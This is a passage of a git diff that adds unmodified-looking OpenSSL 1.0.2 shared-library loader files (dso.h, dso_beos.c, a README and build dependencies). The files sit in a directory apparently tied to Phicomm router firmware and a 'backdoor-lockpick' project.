+dso_openssl.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_openssl.o: ../../include/openssl/opensslconf.h
+dso_openssl.o: ../../include/openssl/opensslv.h
+dso_openssl.o: ../../include/openssl/ossl_typ.h
+dso_openssl.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dso_openssl.o: ../../include/openssl/symhacks.h ../cryptlib.h dso_openssl.c
+dso_vms.o: ../../e_os.h ../../include/openssl/bio.h
+dso_vms.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_vms.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_vms.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_vms.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dso_vms.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dso_vms.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dso_vms.o: ../cryptlib.h dso_vms.c
+dso_win32.o: ../../e_os.h ../../include/openssl/bio.h
+dso_win32.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_win32.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_win32.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_win32.o: ../../include/openssl/opensslconf.h
+dso_win32.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dso_win32.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dso_win32.o: ../../include/openssl/symhacks.h ../cryptlib.h dso_win32.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/README
new file mode 100644
index 0000000..d0bc9a8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/README
@@ -0,0 +1,22 @@
+NOTES
+-----
+
+I've checked out HPUX (well, version 11 at least) and shl_t is
+a pointer type so it's safe to use in the way it has been in
+dso_dl.c. On the other hand, HPUX11 support dlfcn too and
+according to their man page, prefer developers to move to that.
+I'll leave Richard's changes there as I guess dso_dl is needed
+for HPUX10.20.
+
+There is now a callback scheme in place where filename conversion can
+(a) be turned off altogether through the use of the
+    DSO_FLAG_NO_NAME_TRANSLATION flag,
+(b) be handled by default using the default DSO_METHOD's converter
+(c) overriden per-DSO by setting the override callback
+(d) a mix of (b) and (c) - eg. implement an override callback that;
+    (i) checks if we're win32 (if(strstr(dso->meth->name, "win32")....)
+        and if so, convert "blah" into "blah32.dll" (the default is
+	otherwise to make it "blah.dll").
+    (ii) default to the normal behaviour - we're not on win32, eg.
+         finish with (return dso->meth->dso_name_converter(dso,NULL)).
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso.h
new file mode 100644
index 0000000..7c4a1dc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso.h
@@ -0,0 +1,451 @@
+/* dso.h -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_DSO_H
+# define HEADER_DSO_H
+
+# include <openssl/crypto.h>
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+/* These values are used as commands to DSO_ctrl() */
+# define DSO_CTRL_GET_FLAGS      1
+# define DSO_CTRL_SET_FLAGS      2
+# define DSO_CTRL_OR_FLAGS       3
+
+/*
+ * By default, DSO_load() will translate the provided filename into a form
+ * typical for the platform (more specifically the DSO_METHOD) using the
+ * dso_name_converter function of the method. Eg. win32 will transform "blah"
+ * into "blah.dll", and dlfcn will transform it into "libblah.so". The
+ * behaviour can be overriden by setting the name_converter callback in the
+ * DSO object (using DSO_set_name_converter()). This callback could even
+ * utilise the DSO_METHOD's converter too if it only wants to override
+ * behaviour for one or two possible DSO methods. However, the following flag
+ * can be set in a DSO to prevent *any* native name-translation at all - eg.
+ * if the caller has prompted the user for a path to a driver library so the
+ * filename should be interpreted as-is.
+ */
+# define DSO_FLAG_NO_NAME_TRANSLATION            0x01
+/*
+ * An extra flag to give if only the extension should be added as
+ * translation.  This is obviously only of importance on Unix and other
+ * operating systems where the translation also may prefix the name with
+ * something, like 'lib', and ignored everywhere else. This flag is also
+ * ignored if DSO_FLAG_NO_NAME_TRANSLATION is used at the same time.
+ */
+# define DSO_FLAG_NAME_TRANSLATION_EXT_ONLY      0x02
+
+/*
+ * The following flag controls the translation of symbol names to upper case.
+ * This is currently only being implemented for OpenVMS.
+ */
+# define DSO_FLAG_UPCASE_SYMBOL                  0x10
+
+/*
+ * This flag loads the library with public symbols. Meaning: The exported
+ * symbols of this library are public to all libraries loaded after this
+ * library. At the moment only implemented in unix.
+ */
+# define DSO_FLAG_GLOBAL_SYMBOLS                 0x20
+
+typedef void (*DSO_FUNC_TYPE) (void);
+
+typedef struct dso_st DSO;
+
+/*
+ * The function prototype used for method functions (or caller-provided
+ * callbacks) that transform filenames. They are passed a DSO structure
+ * pointer (or NULL if they are to be used independantly of a DSO object) and
+ * a filename to transform. They should either return NULL (if there is an
+ * error condition) or a newly allocated string containing the transformed
+ * form that the caller will need to free with OPENSSL_free() when done.
+ */
+typedef char *(*DSO_NAME_CONVERTER_FUNC)(DSO *, const char *);
+/*
+ * The function prototype used for method functions (or caller-provided
+ * callbacks) that merge two file specifications. They are passed a DSO
+ * structure pointer (or NULL if they are to be used independantly of a DSO
+ * object) and two file specifications to merge. They should either return
+ * NULL (if there is an error condition) or a newly allocated string
+ * containing the result of merging that the caller will need to free with
+ * OPENSSL_free() when done. Here, merging means that bits and pieces are
+ * taken from each of the file specifications and added together in whatever
+ * fashion that is sensible for the DSO method in question.  The only rule
+ * that really applies is that if the two specification contain pieces of the
+ * same type, the copy from the first string takes priority.  One could see
+ * it as the first specification is the one given by the user and the second
+ * being a bunch of defaults to add on if they're missing in the first.
+ */
+typedef char *(*DSO_MERGER_FUNC)(DSO *, const char *, const char *);
+
+typedef struct dso_meth_st {
+    const char *name;
+    /*
+     * Loads a shared library, NB: new DSO_METHODs must ensure that a
+     * successful load populates the loaded_filename field, and likewise a
+     * successful unload OPENSSL_frees and NULLs it out.
+     */
+    int (*dso_load) (DSO *dso);
+    /* Unloads a shared library */
+    int (*dso_unload) (DSO *dso);
+    /* Binds a variable */
+    void *(*dso_bind_var) (DSO *dso, const char *symname);
+    /*
+     * Binds a function - assumes a return type of DSO_FUNC_TYPE. This should
+     * be cast to the real function prototype by the caller. Platforms that
+     * don't have compatible representations for different prototypes (this
+     * is possible within ANSI C) are highly unlikely to have shared
+     * libraries at all, let alone a DSO_METHOD implemented for them.
+     */
+    DSO_FUNC_TYPE (*dso_bind_func) (DSO *dso, const char *symname);
+/* I don't think this would actually be used in any circumstances. */
+# if 0
+    /* Unbinds a variable */
+    int (*dso_unbind_var) (DSO *dso, char *symname, void *symptr);
+    /* Unbinds a function */
+    int (*dso_unbind_func) (DSO *dso, char *symname, DSO_FUNC_TYPE symptr);
+# endif
+    /*
+     * The generic (yuck) "ctrl()" function. NB: Negative return values
+     * (rather than zero) indicate errors.
+     */
+    long (*dso_ctrl) (DSO *dso, int cmd, long larg, void *parg);
+    /*
+     * The default DSO_METHOD-specific function for converting filenames to a
+     * canonical native form.
+     */
+    DSO_NAME_CONVERTER_FUNC dso_name_converter;
+    /*
+     * The default DSO_METHOD-specific function for converting filenames to a
+     * canonical native form.
+     */
+    DSO_MERGER_FUNC dso_merger;
+    /* [De]Initialisation handlers. */
+    int (*init) (DSO *dso);
+    int (*finish) (DSO *dso);
+    /* Return pathname of the module containing location */
+    int (*pathbyaddr) (void *addr, char *path, int sz);
+    /* Perform global symbol lookup, i.e. among *all* modules */
+    void *(*globallookup) (const char *symname);
+} DSO_METHOD;
+
+/**********************************************************************/
+/* The low-level handle type used to refer to a loaded shared library */
+
+struct dso_st {
+    DSO_METHOD *meth;
+    /*
+     * Standard dlopen uses a (void *). Win32 uses a HANDLE. VMS doesn't use
+     * anything but will need to cache the filename for use in the dso_bind
+     * handler. All in all, let each method control its own destiny.
+     * "Handles" and such go in a STACK.
+     */
+    STACK_OF(void) *meth_data;
+    int references;
+    int flags;
+    /*
+     * For use by applications etc ... use this for your bits'n'pieces, don't
+     * touch meth_data!
+     */
+    CRYPTO_EX_DATA ex_data;
+    /*
+     * If this callback function pointer is set to non-NULL, then it will be
+     * used in DSO_load() in place of meth->dso_name_converter. NB: This
+     * should normally set using DSO_set_name_converter().
+     */
+    DSO_NAME_CONVERTER_FUNC name_converter;
+    /*
+     * If this callback function pointer is set to non-NULL, then it will be
+     * used in DSO_load() in place of meth->dso_merger. NB: This should
+     * normally set using DSO_set_merger().
+     */
+    DSO_MERGER_FUNC merger;
+    /*
+     * This is populated with (a copy of) the platform-independant filename
+     * used for this DSO.
+     */
+    char *filename;
+    /*
+     * This is populated with (a copy of) the translated filename by which
+     * the DSO was actually loaded. It is NULL iff the DSO is not currently
+     * loaded. NB: This is here because the filename translation process may
+     * involve a callback being invoked more than once not only to convert to
+     * a platform-specific form, but also to try different filenames in the
+     * process of trying to perform a load. As such, this variable can be
+     * used to indicate (a) whether this DSO structure corresponds to a
+     * loaded library or not, and (b) the filename with which it was actually
+     * loaded.
+     */
+    char *loaded_filename;
+};
+
+DSO *DSO_new(void);
+DSO *DSO_new_method(DSO_METHOD *method);
+int DSO_free(DSO *dso);
+int DSO_flags(DSO *dso);
+int DSO_up_ref(DSO *dso);
+long DSO_ctrl(DSO *dso, int cmd, long larg, void *parg);
+
+/*
+ * This function sets the DSO's name_converter callback. If it is non-NULL,
+ * then it will be used instead of the associated DSO_METHOD's function. If
+ * oldcb is non-NULL then it is set to the function pointer value being
+ * replaced. Return value is non-zero for success.
+ */
+int DSO_set_name_converter(DSO *dso, DSO_NAME_CONVERTER_FUNC cb,
+                           DSO_NAME_CONVERTER_FUNC *oldcb);
+/*
+ * These functions can be used to get/set the platform-independant filename
+ * used for a DSO. NB: set will fail if the DSO is already loaded.
+ */
+const char *DSO_get_filename(DSO *dso);
+int DSO_set_filename(DSO *dso, const char *filename);
+/*
+ * This function will invoke the DSO's name_converter callback to translate a
+ * filename, or if the callback isn't set it will instead use the DSO_METHOD's
+ * converter. If "filename" is NULL, the "filename" in the DSO itself will be
+ * used. If the DSO_FLAG_NO_NAME_TRANSLATION flag is set, then the filename is
+ * simply duplicated. NB: This function is usually called from within a
+ * DSO_METHOD during the processing of a DSO_load() call, and is exposed so
+ * that caller-created DSO_METHODs can do the same thing. A non-NULL return
+ * value will need to be OPENSSL_free()'d.
+ */
+char *DSO_convert_filename(DSO *dso, const char *filename);
+/*
+ * This function will invoke the DSO's merger callback to merge two file
+ * specifications, or if the callback isn't set it will instead use the
+ * DSO_METHOD's merger.  A non-NULL return value will need to be
+ * OPENSSL_free()'d.
+ */
+char *DSO_merge(DSO *dso, const char *filespec1, const char *filespec2);
+/*
+ * If the DSO is currently loaded, this returns the filename that it was
+ * loaded under, otherwise it returns NULL. So it is also useful as a test as
+ * to whether the DSO is currently loaded. NB: This will not necessarily
+ * return the same value as DSO_convert_filename(dso, dso->filename), because
+ * the DSO_METHOD's load function may have tried a variety of filenames (with
+ * and/or without the aid of the converters) before settling on the one it
+ * actually loaded.
+ */
+const char *DSO_get_loaded_filename(DSO *dso);
+
+void DSO_set_default_method(DSO_METHOD *meth);
+DSO_METHOD *DSO_get_default_method(void);
+DSO_METHOD *DSO_get_method(DSO *dso);
+DSO_METHOD *DSO_set_method(DSO *dso, DSO_METHOD *meth);
+
+/*
+ * The all-singing all-dancing load function, you normally pass NULL for the
+ * first and third parameters. Use DSO_up and DSO_free for subsequent
+ * reference count handling. Any flags passed in will be set in the
+ * constructed DSO after its init() function but before the load operation.
+ * If 'dso' is non-NULL, 'flags' is ignored.
+ */
+DSO *DSO_load(DSO *dso, const char *filename, DSO_METHOD *meth, int flags);
+
+/* This function binds to a variable inside a shared library. */
+void *DSO_bind_var(DSO *dso, const char *symname);
+
+/* This function binds to a function inside a shared library. */
+DSO_FUNC_TYPE DSO_bind_func(DSO *dso, const char *symname);
+
+/*
+ * This method is the default, but will beg, borrow, or steal whatever method
+ * should be the default on any particular platform (including
+ * DSO_METH_null() if necessary).
+ */
+DSO_METHOD *DSO_METHOD_openssl(void);
+
+/*
+ * This method is defined for all platforms - if a platform has no DSO
+ * support then this will be the only method!
+ */
+DSO_METHOD *DSO_METHOD_null(void);
+
+/*
+ * If DSO_DLFCN is defined, the standard dlfcn.h-style functions (dlopen,
+ * dlclose, dlsym, etc) will be used and incorporated into this method. If
+ * not, this method will return NULL.
+ */
+DSO_METHOD *DSO_METHOD_dlfcn(void);
+
+/*
+ * If DSO_DL is defined, the standard dl.h-style functions (shl_load,
+ * shl_unload, shl_findsym, etc) will be used and incorporated into this
+ * method. If not, this method will return NULL.
+ */
+DSO_METHOD *DSO_METHOD_dl(void);
+
+/* If WIN32 is defined, use DLLs. If not, return NULL. */
+DSO_METHOD *DSO_METHOD_win32(void);
+
+/* If VMS is defined, use shared images. If not, return NULL. */
+DSO_METHOD *DSO_METHOD_vms(void);
+
+/*
+ * This function writes null-terminated pathname of DSO module containing
+ * 'addr' into 'sz' large caller-provided 'path' and returns the number of
+ * characters [including trailing zero] written to it. If 'sz' is 0 or
+ * negative, 'path' is ignored and required amount of charachers [including
+ * trailing zero] to accomodate pathname is returned. If 'addr' is NULL, then
+ * pathname of cryptolib itself is returned. Negative or zero return value
+ * denotes error.
+ */
+int DSO_pathbyaddr(void *addr, char *path, int sz);
+
+/*
+ * This function should be used with caution! It looks up symbols in *all*
+ * loaded modules and if module gets unloaded by somebody else attempt to
+ * dereference the pointer is doomed to have fatal consequences. Primary
+ * usage for this function is to probe *core* system functionality, e.g.
+ * check if getnameinfo(3) is available at run-time without bothering about
+ * OS-specific details such as libc.so.versioning or where does it actually
+ * reside: in libc itself or libsocket.
+ */
+void *DSO_global_lookup(const char *name);
+
+/* If BeOS is defined, use shared images. If not, return NULL. */
+DSO_METHOD *DSO_METHOD_beos(void);
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_DSO_strings(void);
+
+/* Error codes for the DSO functions. */
+
+/* Function codes. */
+# define DSO_F_BEOS_BIND_FUNC                             144
+# define DSO_F_BEOS_BIND_VAR                              145
+# define DSO_F_BEOS_LOAD                                  146
+# define DSO_F_BEOS_NAME_CONVERTER                        147
+# define DSO_F_BEOS_UNLOAD                                148
+# define DSO_F_DLFCN_BIND_FUNC                            100
+# define DSO_F_DLFCN_BIND_VAR                             101
+# define DSO_F_DLFCN_LOAD                                 102
+# define DSO_F_DLFCN_MERGER                               130
+# define DSO_F_DLFCN_NAME_CONVERTER                       123
+# define DSO_F_DLFCN_UNLOAD                               103
+# define DSO_F_DL_BIND_FUNC                               104
+# define DSO_F_DL_BIND_VAR                                105
+# define DSO_F_DL_LOAD                                    106
+# define DSO_F_DL_MERGER                                  131
+# define DSO_F_DL_NAME_CONVERTER                          124
+# define DSO_F_DL_UNLOAD                                  107
+# define DSO_F_DSO_BIND_FUNC                              108
+# define DSO_F_DSO_BIND_VAR                               109
+# define DSO_F_DSO_CONVERT_FILENAME                       126
+# define DSO_F_DSO_CTRL                                   110
+# define DSO_F_DSO_FREE                                   111
+# define DSO_F_DSO_GET_FILENAME                           127
+# define DSO_F_DSO_GET_LOADED_FILENAME                    128
+# define DSO_F_DSO_GLOBAL_LOOKUP                          139
+# define DSO_F_DSO_LOAD                                   112
+# define DSO_F_DSO_MERGE                                  132
+# define DSO_F_DSO_NEW_METHOD                             113
+# define DSO_F_DSO_PATHBYADDR                             140
+# define DSO_F_DSO_SET_FILENAME                           129
+# define DSO_F_DSO_SET_NAME_CONVERTER                     122
+# define DSO_F_DSO_UP_REF                                 114
+# define DSO_F_GLOBAL_LOOKUP_FUNC                         138
+# define DSO_F_PATHBYADDR                                 137
+# define DSO_F_VMS_BIND_SYM                               115
+# define DSO_F_VMS_LOAD                                   116
+# define DSO_F_VMS_MERGER                                 133
+# define DSO_F_VMS_UNLOAD                                 117
+# define DSO_F_WIN32_BIND_FUNC                            118
+# define DSO_F_WIN32_BIND_VAR                             119
+# define DSO_F_WIN32_GLOBALLOOKUP                         142
+# define DSO_F_WIN32_GLOBALLOOKUP_FUNC                    143
+# define DSO_F_WIN32_JOINER                               135
+# define DSO_F_WIN32_LOAD                                 120
+# define DSO_F_WIN32_MERGER                               134
+# define DSO_F_WIN32_NAME_CONVERTER                       125
+# define DSO_F_WIN32_PATHBYADDR                           141
+# define DSO_F_WIN32_SPLITTER                             136
+# define DSO_F_WIN32_UNLOAD                               121
+
+/* Reason codes. */
+# define DSO_R_CTRL_FAILED                                100
+# define DSO_R_DSO_ALREADY_LOADED                         110
+# define DSO_R_EMPTY_FILE_STRUCTURE                       113
+# define DSO_R_FAILURE                                    114
+# define DSO_R_FILENAME_TOO_BIG                           101
+# define DSO_R_FINISH_FAILED                              102
+# define DSO_R_INCORRECT_FILE_SYNTAX                      115
+# define DSO_R_LOAD_FAILED                                103
+# define DSO_R_NAME_TRANSLATION_FAILED                    109
+# define DSO_R_NO_FILENAME                                111
+# define DSO_R_NO_FILE_SPECIFICATION                      116
+# define DSO_R_NULL_HANDLE                                104
+# define DSO_R_SET_FILENAME_FAILED                        112
+# define DSO_R_STACK_ERROR                                105
+# define DSO_R_SYM_FAILURE                                106
+# define DSO_R_UNLOAD_FAILED                              107
+# define DSO_R_UNSUPPORTED                                108
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_beos.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_beos.c
new file mode 100644
index 0000000..68ebcd8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_beos.c
@@ -0,0 +1,253 @@
+/* dso_beos.c */
+/*
+ * Written by Marcin Konicki (ahwayakchih@neoni.net) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include "cryptlib.h"
+#include <openssl/dso.h>
+
+#if !defined(OPENSSL_SYS_BEOS)
+DSO_METHOD *DSO_METHOD_beos(void)
+{
+    return NULL;
+}
+#else
+
+# include <kernel/image.h>
+
+static int beos_load(DSO *dso);
+static int beos_unload(DSO *dso);
+static void *beos_bind_var(DSO *dso, const char *symname);
+static DSO_FUNC_TYPE beos_bind_func(DSO *dso, const char *symname);
+# if 0
+static int beos_unbind_var(DSO *dso, char *symname, void *symptr);
+static int beos_unbind_func(DSO *dso, char *symname, DSO_FUNC_TYPE symptr);
+static int beos_init(DSO *dso);
+static int beos_finish(DSO *dso);
+static long beos_ctrl(DSO *dso, int cmd, long larg, void *parg);
+# endif
+static char *beos_name_converter(DSO *dso, const char *filename);
+
+static DSO_METHOD dso_meth_beos = {
+    "OpenSSL 'beos' shared library method",
+    beos_load,
+    beos_unload,
+    beos_bind_var,
+    beos_bind_func,
+/* For now, "unbind" doesn't exist */
+# if 0
+    NULL,                       /* unbind_var */
+    NULL,                       /* unbind_func */
+# endif
+    NULL,                       /* ctrl */
+    beos_name_converter,
+    NULL,                       /* init */
+    NULL                        /* finish */
+};
+
+DSO_METHOD *DSO_METHOD_beos(void)
+{
+    return (&dso_meth_beos);
+}
+
+/*
+ * For this DSO_METHOD, our meth_data STACK will contain; (i) a pointer to
+ * the handle (image_id) returned from load_add_on().
+ */
+
+static int beos_load(DSO *dso)
+{
+    image_id id;
+    /* See applicable comments from dso_dl.c */
+    char *filename = DSO_convert_filename(dso, NULL);
+
+    if (filename == NULL) {
+        DSOerr(DSO_F_BEOS_LOAD, DSO_R_NO_FILENAME);
+        goto err;
+    }
+    id = load_add_on(filename);
+    if (id < 1) {
+        DSOerr(DSO_F_BEOS_LOAD, DSO_R_LOAD_FAILED);
+        ERR_add_error_data(3, "filename(", filename, ")");
+        goto err;
+    }
+    if (!sk_push(dso->meth_data, (char *)id)) {
+        DSOerr(DSO_F_BEOS_LOAD, DSO_R_STACK_ERROR);
+        goto err;
+    }
+    /* Success */
+    dso->loaded_filename = filename;
+    return (1);
+ err:
+    /* Cleanup ! */
+    if (filename != NULL)
+        OPENSSL_free(filename);
+    if (id > 0)
+        unload_add_on(id);
+    return (0);
+}
+
+static int beos_unload(DSO *dso)
+{
+    image_id id;
+    if (dso == NULL) {
+        DSOerr(DSO_F_BEOS_UNLOAD, ERR_R_PASSED_NULL_PARAMETER);
+        return (0);
+    }
+    if (sk_num(dso->meth_data) < 1)
+        return (1);
+    id = (image_id) sk_pop(dso->meth_data);
+    if (id < 1) {
+        DSOerr(DSO_F_BEOS_UNLOAD, DSO_R_NULL_HANDLE);
+        return (0);
+    }
+    if (unload_add_on(id) != B_OK) {
+        DSOerr(DSO_F_BEOS_UNLOAD, DSO_R_UNLOAD_FAILED);
+        /*
+         * We should push the value back onto the stack in case of a retry.
+         */
+        sk_push(dso->meth_data, (char *)id);
+        return (0);
+    }
+    return (1);
+}
+
+static void *beos_bind_var(DSO *dso, const char *symname)
+{
+    image_id id;
+    void *sym;
+
+    if ((dso == NULL) || (symname == NULL)) {
+        DSOerr(DSO_F_BEOS_BIND_VAR, ERR_R_PASSED_NULL_PARAMETER);
+        return (NULL);
+    }
+    if (sk_num(dso->meth_data) < 1) {
+        DSOerr(DSO_F_BEOS_BIND_VAR, DSO_R_STACK_ERROR);
+        return (NULL);
+    }
+    id = (image_id) sk_value(dso->meth_data, sk_num(dso->meth_data) - 1);
+    if (id < 1) {
+        DSOerr(DSO_F_BEOS_BIND_VAR, DSO_R_NULL_HANDLE);
+        return (NULL);
+    }
+    if (get_image_symbol(id, symname, B_SYMBOL_TYPE_DATA, &sym) != B_OK) {
+        DSOerr(DSO_F_BEOS_BIND_VAR, DSO_R_SYM_FAILURE);
+        ERR_add_error_data(3, "symname(", symname, ")");
+        return (NULL);
+    }
+    return (sym);
+}
+
+static DSO_FUNC_TYPE beos_bind_func(DSO *dso, const char *symname)
+{
+    image_id id;
+    void *sym;
+
+    if ((dso == NULL) || (symname == NULL)) {
+        DSOerr(DSO_F_BEOS_BIND_FUNC, ERR_R_PASSED_NULL_PARAMETER);
+        return (NULL);
+    }
+    if (sk_num(dso->meth_data) < 1) {
+        DSOerr(DSO_F_BEOS_BIND_FUNC, DSO_R_STACK_ERROR);
+        return (NULL);
+    }
+    id = (image_id) sk_value(dso->meth_data, sk_num(dso->meth_data) - 1);
+    if (id < 1) {
+        DSOerr(DSO_F_BEOS_BIND_FUNC, DSO_R_NULL_HANDLE);
+        return (NULL);
+    }
+    if (get_image_symbol(id, symname, B_SYMBOL_TYPE_TEXT, &sym) != B_OK) {
+        DSOerr(DSO_F_BEOS_BIND_FUNC, DSO_R_SYM_FAILURE);
+        ERR_add_error_data(3, "symname(", symname, ")");
+        return (NULL);
+    }
+    return ((DSO_FUNC_TYPE)sym);
+}
+
+/* This one is the same as the one in dlfcn */
+static char *beos_name_converter(DSO *dso, const char *filename)
+{
+    char *translated;
+    int len, rsize, transform;
+
+    len = strlen(filename);
+    rsize = len + 1;
+    transform = (strstr(filename, "/") == NULL);
+    if (transform) {
+        /* We will convert this to "%s.so" or "lib%s.so" */
+        rsize += 3;             /* The length of ".so" */
+        if ((DSO_flags(dso) & DSO_FLAG_NAME_TRANSLATION_EXT_ONLY) == 0)
+            rsize += 3;         /* The length of "lib" */
+    }
+    translated = OPENSSL_malloc(rsize);
+    if (translated == NULL) {
+        DSOerr(DSO_F_BEOS_NAME_CONVERTER, DSO_R_NAME_TRANSLATION_FAILED);
+        return (NULL);
+    }
+    if (transform) {
+        if ((DSO_flags(dso) & DSO_FLAG_NAME_TRANSLATION_EXT_ONLY) == 0)
+            sprintf(translated, "lib%s.so", filename);
+        else
+            sprintf(translated, "%s.so", filename);
+    } else
+        sprintf(translated, "%s", filename);
+    return (translated);
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_beos.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_beos.o
new file mode 100644
index 0000000000000000000000000000000000000000..263fe2e49bb3a4dec8368ce14ee431bea0944545
GIT binary patch
literal 1368
zcmbtUOH0E*5T2O&F8IKMph!Kbs7vbu(SsDU)`ME`0bZn}H7aNuNw!cu=wI;YPw^;t
